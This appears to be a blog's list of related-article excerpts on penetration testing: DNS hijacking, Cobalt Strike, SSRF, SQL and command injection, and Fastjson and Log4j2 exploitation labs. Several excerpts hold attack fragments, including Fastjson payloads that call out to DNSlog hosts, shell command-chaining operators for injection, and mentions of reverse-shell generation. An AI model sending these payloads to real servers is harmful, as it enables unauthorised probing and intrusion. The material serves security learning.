相关文章

基于内网dns劫持与网页挂马实测案例

dns劫持与网页挂马 前提工作 ——搭建CS(CobaltStrike) CobaltStrike简介 CobaltStrike是一款内网渗透测试神器,常被业界人称为CS。Cobalt Strike 2.0版本主要是结合Metasploit可以称为图形化MSF工具。而Cobalt Strike 3.0已经不再使用Me…

从未授权内网redis到CS上线

声明 免责声明:本文为个人作品,只做技术研究,只可用于正常的技术交流与学习,不可用于灰黑产业,不可从事违法犯罪行,严禁利用本文所介绍的技术进行未授权的恶意攻击,否则,后果自负&a…

eBPF系列之:DeepFlow 扩展协议解析实践(MongoDB协议与Kafka协议)

原文:https://blog.mickeyzzc.tech/posts/ebpf/deepflow-agent-proto-dev MongoDB 目前使用广泛,但是缺乏有效的可观测能力。DeepFlow 在可观测能力上是很优秀的解决方案,但是却缺少了对 MongoDB 协议的支持。该文是为 DeepFlow 扩展了 Mong…

【网络安全】命令执行漏洞

命令执行漏洞 命令执行漏洞原理危害检测方法有回显检测方法; (分号) 从左到右执行| (管道符) 将见面命令的输入为后面命令的标准输入&(后台任务符号) 命令从左到右执行&&(与) 逻辑与,前面命令执行成功后才会执行||(或) 逻辑或,前面执行失败才…

乱七八糟的一些web记录(纯备份用)

目录 thinkphp6 python反编译 Web题目 ssl注入 RCE 字符长度限制 7字符长度 某个字母被ban的绕过方法 ping题目 不含数字和字母的 提权题目 upload题目: 字符绕过 ool注入 Sql注入 更新段表 注入1: Handle注入 布尔盲注 特殊方法 测…

护网面试总结

护网面试总结 1.设备误报如何处理? 包含有SQL语句和一些危险函数都有可能产生误报 来自外网的误报说明安全设备需要进行策略升级,不需要处置。 如果是来自内网的误报可以和负责人协商一下看能不能解决,有必要的话添加白名单处理。 2.如何区分…

数据库out_of_band攻击【原理分析、复现】

这个问题已经是去年提出的了,之前也看到过,在CTF题目环境中利用过却对原理不慎了解,在公司大佬们的帮助下成功了理解了一波原理。这里对原理进行一波总结,并利用了CEYE平台成功的进行了原理复现利用。 博客原文地址:ht…

【SQL注入学习笔记】

SQL注入基础学习 1. 什么是sql注入2. 产生 SQL 注入的原理3. SQL注入产生的危害4. 基础准备4.1 MYSQL基本操作4.2 HTTP基础 5. 注入方式5.1 所需工具5.2 union基础手注5.3 布尔盲注5.4 时间注入5.5 报错注入5.6 DNSlog注入5.7 更新类基础手注5.7 堆叠查询注入5.8 二次注入5.9 宽…

一文搞懂SSRF漏洞

一文搞懂SSRF漏洞 1.原理2.SSRF利用方式/存在点/危害3.SSRF漏洞防御4.SSRF可以利用的协议5.SSRF绕过6.SSRF在各种编程语言中的利用方式7.SSRF打内网8.SSRF打Redis 1.原理 由于服务端提供了从其他服务器应用发起请求获取数据的功能,但没有对目标地址做过滤与限制&am…

Java 代码审计——Fastjson与java.net.URL

0x00 前言 在整理历史内容的时候,突然发现一个问题,为什么可以通过{{"type":"java.net.URL","val":"http://0e96c29c.dns.1433.eu.org"}:"aaa"} 就可以判断版本是大于1.2.36 可以简单看看 Fastjson…

安全学习DAY05_命令文件上传反弹带外

渗透命令–常规命令&文件上传&反弹&带外 文章&工具站 DNSLOG:http://www.dnslog.cn/ 文件下载命令生成工具:https://forum.ywhack.com/bountytips.php?download 反弹Shell命令生成工具:https://forum.ywhack.com/reverse…

【vulhub】fastjson反序列化漏洞验证POC

盲打payload: 1.2.67版本前 {"zeo":{"type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}}1.2.67版本后payload {"type":"java.net.Inet4Address","val":"dnslog&…

SSRF服务器端请求伪造漏洞基础

SSRF服务器端请求伪造漏洞基础,下面分五个专题来说 1、什么是ssrf? 2、ssrf的相关协议 3、有无回显的ssrf漏洞确认 4、ssrf如何利用? 5、ssrf漏洞的绕过 6、ssrf漏洞的加固 一、什么是ssrf? SSRF是一种由攻击者构造形成并由…

【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(1-10)

【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(1-10) 前言 插件开发学习第6套。前置文章: 【BurpSuite】插件开发学习之Log4shell 【BurpSuite】插件开发学习之Software Vulnerability Scanner 【BurpSuite】插件开发学习之dotnet-Be…

Fastjson反序列化漏洞复现

漏洞介绍 FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 通俗理解就是:漏洞利用fastjson autotype在处理json…

(17)网络安全:cookie注入、二次注入、DNSlog注入、中转注入、堆叠注入的原理及注入过程

目录 cookie注入 sqli-lasb-master less-21 方法一:用burpsuite进行抓包后修改 方法二:安装火狐的cookie manager等插件进行修改cookie 第一步:先将注入语句转换为base64加密后密文 ​ 第二步: 将加密后密文填到cookie val…

2021年12月报Log4j1.2网络安全漏洞排查和修复建议

漏洞影响范围 Apache Log4j2远程代码执行漏洞CVE-2021-4104:Apache Log4j 1.2 Apache Log4j2远程代码执行漏洞CVE-2021-44228:Apache Log4j 2.0-beta9 - 2.12.1 、Apache Log4j 2.13.0 - 2.15.0-rc1 Apache Log4j2 拒绝服务攻击漏洞CVE-2021-45046&…

通过vulfocus靶场--复现log4j2漏洞

目录 一、搭建vulfocus靶场 拉取vulfocus靶场镜像 运行vulfocus靶场 二、漏洞复现 1、DNSLog验证 2、JNDI注入反弹shell 反弹shell指令: JNDI启动方法: 一、搭建vulfocus靶场 前提:需要安装docker环境 以centos7为例 拉取vulfocus靶场镜像 docker pull vulfocus/…

JAVA 篇net 之Inet4Address、Inet6Address、URL、URLConnection、HttpURLConnection

为什么要说介绍这几个类,是因为我们在工作中会接触到通过客服端调用的方式 1、Inet4Address、Inet6Address、InetAddress 这两个类主要链接远程机器用的,父类是InetAddress,先来看看是怎么实现拿到机器的ip地址的 public InetAddress[] lookupAllHostAddr(String var1) thro…

分析Apache Log4j2 远程代码执行漏洞

漏洞描述 Log4j是Apache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;也可以控制每一条日志的输出格式;通过定义…